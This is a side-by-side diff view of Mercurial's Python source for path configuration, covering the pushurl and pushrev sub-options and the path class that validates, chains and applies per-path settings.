563 This decorator can be used to perform additional verification of
579 This decorator can be used to perform additional verification of
564 sub-options and to change the type of sub-options.
580 sub-options and to change the type of sub-options.
565 """
581 """
566
582
567 def register(func):
583 def register(func):
568 _pathsuboptions[option] = (attr, func)
584 _pathsuboptions[option] = (attr, func)
569 return func
585 return func
570
586
571 return register
587 return register
572
588
573
589
574 @pathsuboption(b'pushurl', b'pushloc')
590 @pathsuboption(b'pushurl', b'pushloc')
575 def pushurlpathoption(ui, path, value):
591 def pushurlpathoption(ui, path, value):
576 u = url(value)
592 u = url(value)
577 # Actually require a URL.
593 # Actually require a URL.
578 if not u.scheme:
594 if not u.scheme:
579 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
595 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
580 return None
596 return None
581
597
582 # Don't support the #foo syntax in the push URL to declare branch to
598 # Don't support the #foo syntax in the push URL to declare branch to
583 # push.
599 # push.
584 if u.fragment:
600 if u.fragment:
585 ui.warn(
601 ui.warn(
586 _(
602 _(
587 b'("#fragment" in paths.%s:pushurl not supported; '
603 b'("#fragment" in paths.%s:pushurl not supported; '
588 b'ignoring)\n'
604 b'ignoring)\n'
589 )
605 )
590 % path.name
606 % path.name
591 )
607 )
592 u.fragment = None
608 u.fragment = None
593
609
594 return bytes(u)
610 return bytes(u)
595
611
596
612
597 @pathsuboption(b'pushrev', b'pushrev')
613 @pathsuboption(b'pushrev', b'pushrev')
598 def pushrevpathoption(ui, path, value):
614 def pushrevpathoption(ui, path, value):
599 return value
615 return value
600
616
601
617
602 class path(object):
618 class path(object):
603 """Represents an individual path and its configuration."""
619 """Represents an individual path and its configuration."""
604
620
605 def __init__(self, ui, name, rawloc=None, suboptions=None):
621 def __init__(self, ui, name, rawloc=None, suboptions=None):
606 """Construct a path from its config options.
622 """Construct a path from its config options.
607
623
608 ``ui`` is the ``ui`` instance the path is coming from.
624 ``ui`` is the ``ui`` instance the path is coming from.
609 ``name`` is the symbolic name of the path.
625 ``name`` is the symbolic name of the path.
610 ``rawloc`` is the raw location, as defined in the config.
626 ``rawloc`` is the raw location, as defined in the config.
611 ``pushloc`` is the raw locations pushes should be made to.
627 ``pushloc`` is the raw locations pushes should be made to.
612
628
613 If ``name`` is not defined, we require that the location be a) a local
629 If ``name`` is not defined, we require that the location be a) a local
614 filesystem path with a .hg directory or b) a URL. If not,
630 filesystem path with a .hg directory or b) a URL. If not,
615 ``ValueError`` is raised.
631 ``ValueError`` is raised.
616 """
632 """
617 if not rawloc:
633 if not rawloc:
618 raise ValueError(b'rawloc must be defined')
634 raise ValueError(b'rawloc must be defined')
619
635
620 # Locations may define branches via syntax <base>#<branch>.
636 # Locations may define branches via syntax <base>#<branch>.
621 u = url(rawloc)
637 u = url(rawloc)
622 branch = None
638 branch = None
623 if u.fragment:
639 if u.fragment:
624 branch = u.fragment
640 branch = u.fragment
625 u.fragment = None
641 u.fragment = None
626
642
627 self.url = u
643 self.url = u
628 # the url from the config/command line before dealing with `path://`
644 # the url from the config/command line before dealing with `path://`
629 self.raw_url = u.copy()
645 self.raw_url = u.copy()
630 self.branch = branch
646 self.branch = branch
631
647
632 self.name = name
648 self.name = name
633 self.rawloc = rawloc
649 self.rawloc = rawloc
634 self.loc = b'%s' % u
650 self.loc = b'%s' % u
635
651
636 self._validate_path()
652 self._validate_path()
637
653
638 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
654 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
639 self._own_sub_opts = {}
655 self._own_sub_opts = {}
640 if suboptions is not None:
656 if suboptions is not None:
641 self._own_sub_opts = suboptions.copy()
657 self._own_sub_opts = suboptions.copy()
642 sub_opts.update(suboptions)
658 sub_opts.update(suboptions)
643 self._all_sub_opts = sub_opts.copy()
659 self._all_sub_opts = sub_opts.copy()
644
660
645 self._apply_suboptions(ui, sub_opts)
661 self._apply_suboptions(ui, sub_opts)
646
662
647 def chain_path(self, ui, paths):
663 def chain_path(self, ui, paths):
648 if self.url.scheme == b'path':
664 if self.url.scheme == b'path':
649 assert self.url.path is None
665 assert self.url.path is None
650 try:
666 try:
651 subpath = paths[self.url.host]
667 subpath = paths[self.url.host]
652 except KeyError:
668 except KeyError:
653 m = _(b'cannot use `%s`, "%s" is not a known path')
669 m = _(b'cannot use `%s`, "%s" is not a known path')
654 m %= (self.rawloc, self.url.host)
670 m %= (self.rawloc, self.url.host)
655 raise error.Abort(m)
671 raise error.Abort(m)
656 if subpath.raw_url.scheme == b'path':
672 if subpath.raw_url.scheme == b'path':
657 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
673 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
658 m %= (self.rawloc, self.url.host)
674 m %= (self.rawloc, self.url.host)
659 raise error.Abort(m)
675 raise error.Abort(m)
660 self.url = subpath.url
676 self.url = subpath.url
661 self.rawloc = subpath.rawloc
677 self.rawloc = subpath.rawloc
662 self.loc = subpath.loc
678 self.loc = subpath.loc
663 if self.branch is None:
679 if self.branch is None:
664 self.branch = subpath.branch
680 self.branch = subpath.branch
665 else:
681 else:
666 base = self.rawloc.rsplit(b'#', 1)[0]
682 base = self.rawloc.rsplit(b'#', 1)[0]
667 self.rawloc = b'%s#%s' % (base, self.branch)
683 self.rawloc = b'%s#%s' % (base, self.branch)
668 suboptions = subpath._all_sub_opts.copy()
684 suboptions = subpath._all_sub_opts.copy()
669 suboptions.update(self._own_sub_opts)
685 suboptions.update(self._own_sub_opts)
670 self._apply_suboptions(ui, suboptions)
686 self._apply_suboptions(ui, suboptions)
671
687
672 def _validate_path(self):
688 def _validate_path(self):
673 # When given a raw location but not a symbolic name, validate the
689 # When given a raw location but not a symbolic name, validate the
674 # location is valid.
690 # location is valid.
675 if (
691 if (
676 not self.name
692 not self.name
677 and not self.url.scheme
693 and not self.url.scheme
678 and not self._isvalidlocalpath(self.loc)
694 and not self._isvalidlocalpath(self.loc)
679 ):
695 ):
680 raise ValueError(
696 raise ValueError(
681 b'location is not a URL or path to a local '
697 b'location is not a URL or path to a local '
682 b'repo: %s' % self.rawloc
698 b'repo: %s' % self.rawloc
683 )
699 )
684
700
685 def _apply_suboptions(self, ui, sub_options):
701 def _apply_suboptions(self, ui, sub_options):
686 # Now process the sub-options. If a sub-option is registered, its
702 # Now process the sub-options. If a sub-option is registered, its
687 # attribute will always be present. The value will be None if there
703 # attribute will always be present. The value will be None if there
688 # was no valid sub-option.
704 # was no valid sub-option.
689 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
705 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
690 if suboption not in sub_options:
706 if suboption not in sub_options:
691 setattr(self, attr, None)
707 setattr(self, attr, None)
692 continue
708 continue
693
709
694 value = func(ui, self, sub_options[suboption])
710 value = func(ui, self, sub_options[suboption])
695 setattr(self, attr, value)
711 setattr(self, attr, value)
696
712
697 def _isvalidlocalpath(self, path):
713 def _isvalidlocalpath(self, path):
698 """Returns True if the given path is a potentially valid repository.
714 """Returns True if the given path is a potentially valid repository.
699 This is its own function so that extensions can change the definition of
715 This is its own function so that extensions can change the definition of
700 'valid' in this case (like when pulling from a git repo into a hg
716 'valid' in this case (like when pulling from a git repo into a hg
701 one)."""
717 one)."""
702 try:
718 try:
703 return os.path.isdir(os.path.join(path, b'.hg'))
719 return os.path.isdir(os.path.join(path, b'.hg'))
704 # Python 2 may return TypeError. Python 3, ValueError.
720 # Python 2 may return TypeError. Python 3, ValueError.
705 except (TypeError, ValueError):
721 except (TypeError, ValueError):
706 return False
722 return False
707
723
708 @property
724 @property
709 def suboptions(self):
725 def suboptions(self):
710 """Return sub-options and their values for this path.
726 """Return sub-options and their values for this path.
711
727
712 This is intended to be used for presentation purposes.
728 This is intended to be used for presentation purposes.
713 """
729 """
714 d = {}
730 d = {}
715 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
731 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
716 value = getattr(self, attr)
732 value = getattr(self, attr)
717 if value is not None:
733 if value is not None:
718 d[subopt] = value
734 d[subopt] = value
719 return d
735 return d
General Comments 0
You need to be logged in to leave comments. Login now